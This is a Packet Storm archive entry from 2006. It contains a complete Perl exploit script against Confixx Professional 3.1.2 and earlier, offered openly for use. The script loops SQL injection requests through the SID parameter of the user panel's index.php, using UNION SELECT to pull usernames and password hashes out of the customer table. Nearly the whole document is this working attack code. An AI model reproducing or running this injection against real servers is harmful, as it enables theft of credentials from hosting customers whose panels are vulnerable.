confixx_exploit.pl.txt

2006-04-28T00:00:00
ID PACKETSTORM:45846
Type packetstorm
Reporter defa
Modified 2006-04-28T00:00:00

Description

                                        
                                            `sry - i know this isn't a cvs repository here -  
  
but the code posted yesterday was written after some 'b33r' an i made   
it looking  
a little less drunk this morning.  
  
bye  
defa  
  
----BOF----  
#!/usr/bin/perl  
  
########################################################################   
########  
#   
#  
# exploit for confixx professional <=   
3.1.2 #  
#   
#  
# the vulerability was discovered by: LoK   
Crew #  
# references: http://www.securityfocus.com/bid/   
17476 #  
#   
#  
# exploit can be used for any purpose but on own   
risk #  
#   
#  
# (c) by defa - sorry for the crappy   
code #  
#   
#  
# url is just the host - directory is $url/user/index.php by   
default #  
# the exploit just fetches the longpw hashes of alle   
users #  
#   
#  
# parts of the code are stolen from RuSH exploits - thanks a lot   
folks #  
########################################################################   
########  
  
use IO::Socket;  
  
if (@ARGV < 1)  
{  
print q(  
exploit by defa (2006)  
=========================  
confixx_exploit.pl [URL]  
  
params:  
[URL] - server url  
  
example: confixx_exploit.pl 127.0.0.1  
);  
exit;  
}  
  
$serv = $ARGV[0];  
$serv =~ s/(http:\/\/)//eg;  
  
for ($i=0;$i<=100;$i++)  
{  
$hit = 0;  
$url = "http://";  
$url .= $serv;  
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";  
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B11,':%22','HIT:   
%20',";  
$url .= "kunde,'%20:%20',longpw,'%20:%20','%22;')%20AS%20'sdata'%   
20FROM%20";  
$url .= "kunden%20LIMIT%20";  
$url .= "$i,1/*";  
  
$socket = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $serv,  
PeerPort => "80") || die "[-] CONNECT FAILED\r\n";  
  
  
print $socket "GET $url HTTP/1.1\n";  
print $socket "Host: $serv\n";  
print $socket 'User-Agent: confixx_exploit'."\n";  
print $socket "Connection: close\n\n";  
while ($answer = <$socket>)  
{  
if ($answer =~ /<p>HIT:/)  
{  
@result = split(/: /,$answer);  
  
print "$result[1]: $result[2]\n";  
$hit = 1;  
}  
  
}  
if ($hit == 0) {die("that's it");}  
}  
  
----EOF----  
--  
don't eat yellow snow  
  
  
  
`